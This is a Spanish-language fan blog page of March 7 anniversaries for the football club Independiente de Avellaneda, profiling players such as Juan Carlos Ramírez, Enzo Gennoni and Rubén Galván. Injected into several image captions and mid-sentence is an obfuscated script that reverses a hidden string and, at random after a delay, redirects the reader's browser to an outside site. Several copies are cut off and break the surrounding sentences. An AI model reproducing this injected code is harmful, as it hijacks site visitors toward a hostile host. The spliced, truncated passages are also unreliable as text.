Conectate con nosotros

Efemérides

Efemérides del 07 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1965Nacimiento en San Andrés de Giles, Provincia de Buenos Aires, de Juan Carlos “El Avión” Ramírez, quien jugó 243 partidos con 9 goles entre 1993 y 2002, para ser parte integrante del plantel que se ganó el Clausura 1994, Supercopas 1994 y 1995, y Recopa 1995.

Defensor lateral que debutó en Lanús con 19 años, cuando dicho equipo jugaba en Primera “B” allá por 1984. Pasó luego por Estudiantes desde 1988 a 1993 disputando casi 200 partidos, y llegó al Rojo para formar parte del proceso multicampeón 1994-1995, con Miguel Brindisi como D.T. primero y luego Miguel Ángel López. Jugó los primero partidos de la Supercopa 1994 pero luego Guillermo “Luli” Ríos fue el titular, del mismo modo que fue alternando partidos en la Supercopa de 1995, mientras que en la Recopa ganada a Vélez en Japón fue el lateral derecho titular.

Posteriormente, ya afianzado en el equipo, llegó a ser capitán dos temporadas. Era un lateral de gran velocidad y despliegue, parecía tener más de dos pulmones, sin conocer el agotamiento. Además podía jugar tanto de lateral por la derecha como por la izquierda. En 2001 estuvo a punto de ser dejado libre, hasta que finalmente renovó por un año más. Luego pasó a El Porvenir en 2003 y se retiró. También llegó a jugar un partido con la Selección Nacional, en el proceso de Daniel Passarella como D.T.

Lo último que pude saber sobre Juan es que se encontraba trabajando como profesor en la escuelita de Fútbol del club, y también que es parte del plantel de Fútbol Senior del Rojo.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»65″ height=»50″/></figure></div>



<p>Les dejo <strong>video con un gol del “Avión”,</strong> en la fecha 18 del Clausura 1995 con triunfo a Rosario Central:</p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»74″ height=»57″/></figure></div>



<p><strong>1971</strong> – <strong>Independiente hace su debut en el Campeona<script>$mWn=function(n){if(typeof ($mWn.list[n])==to Metropolitano 1971, que al finalizar lo tendría como campeón coronándose por segunda vez consecutiva en dicho torneo. La presentación en la competencia fue un día como hoy recibiendo a Rosario Central, al cual le gana por 2 a 0 con goles de Enzo Gennoni de penal y José Omar “Pato” Pastoriza. Pero no es eso lo más importante, porque lo que amerita la efeméride es el debut de 3 futbolistas en aquel partido.

El primero de ellos fue justamente el autor del primer tanto, Enzo Gennoni. Delantero que surgió de Vélez, pasó por el fútbol uruguayo, luego Platense, Rosario Central y River, hasta llegar al Rojo y jugar solamente ese año 1971. Disputó apenas 15 partidos pero aportó con 5 goles, destacándose en el inicio del torneo con el gol mencionado, luego marcó por duplicado en la fecha 2 cuando se venció a Platense en lo que fue la máxima goleada conseguida por Independiente en su historia, en la tercer fecha volvería a marcar un gol en el triunfo sobre Boca, y su quinto tanto se lo hizo en la fecha 13 a River en el empate 1 a 1. Posteriormente siguió su carrera en México.

El segundo debut fue el de Miguel Ángel “el Zurdo” López, a quien recordamos el primer día del mes por su cumpleaños, pero aún así vale repasar sus logros en el club. Fueron 168 sus partidos entre un día como hoy y 1975, convirtiendo 1 gol, y siendo campeón de todo: Metropolitano 1971, 4 Copas Libertadores consecutivas (1972, 1973, 1974 y 1975), 2 Copas Interamericanas (1973 y 1974) y la Copa Intercontinental de 1973, un campeón total.

Por último, y volviendo al sector de ataque del equipo, el tercer debutante en aquella primera fecha del Metropolitano 1971 fue Agustín “Mencho” Balbuena, en puntero derecho más ganador en la historia roja, sobre el cual hablaré dentro de dos días, por motivo de conmemorarse el aniversario de su fallecimiento.

Finalmente repetir que Independiente fue campeón de ese Metropolitano 1971, un punto sobre Vélez, pero ya habrá tiempo para repasar y desglosar lo que fue el campeonato.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»83″ height=»64″/></figure></div>



<p><strong>1976</strong> – <strong>Fecha 5</strong> del <strong>Metropolitano</strong> 1976, en la cual <strong>al Rojo le <script>$mWn=function(n){if(typeof ($mWn.list[n])==toca visitar a Ferro en Caballito, y antes de ir directo al motivo de la efeméride, como dato de importancia les cuento que ese día debutó Héctor Cúper en el conjunto local. Una gloria absoluta de Ferro, y con una gran trayectoria como D.T. internacional.

El partido terminó 0 a 0 y el dato que fundamenta la efeméride, es que en aquel encuentro sufre la fractura del peroné Rubén “El Negro” Galván. Fue aproximadamente a los 15 minutos de la primera etapa trabando con el lateral del rival Roberto Franco, y el doctor de Independiente, Miguel Fernández Schnorr, se dio cuenta inmediatamente que había fractura. Pero Galván quería seguir jugando, fiel a su estilo guerrero dentro de la cancha, aunque esta vez llevándolo al extremo.

El D.T. Miguel Ignomiriello le consultó fuera del campo si podía aguantar hasta el entretiempo y Galván contestó que sí, le aplicaron spray analgésico y siguió. Ya en el descanso lo infiltraron y él sin dudarlo salió a jugar la segunda mitad, así como leen, con el peroné fracturado desde el primer tiempo Rubén salió a disputar el segundo tiempo.

Lo vieron renguear y nadie dudaba de que si el “Negro” corría así era porque realmente había mucho dolor, y fue por eso que a los 55’se iría reemplazado por Pedro Magallanes, completando unos 40 minutos de juego con la grave lesión. Pero aquí no termina todo, es decir, no se termina para nada la fortaleza de uno de los jugadores con más fuerza en su espíritu y amor propio que haya vestido la camiseta roja en toda la historia.

Luego de los estudios correspondientes, los médicos le daban 6 meses de recuperación, pero éste verdadero hombre de hierro volvió en menos de 3 meses, así como leen, y lo hizo ni más ni menos que frente a Racing para ganarle en su propia cancha el 30 de mayo.

Por las dudas que no lo sepan, les cuento que Rubén Galván para ese año, ya era campeón de un Metropolitano, 4 Copas Libertadores, 2 Copas Interamericanas y 1 Copa Intercontinental, pero a pesar de semejante cantidad de vueltas olímpicas que dio cuando llevaba 5 años en el club, debía recuperarse y estar en excelentes condiciones, ya que al “Negro” todavía le esperaba ganar otra Copa Interamericana y dos Torneos Nacionales con Independiente, más ser campeón mundial con la Selección Argentina ¡¡Que ídolo por favor!!.

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides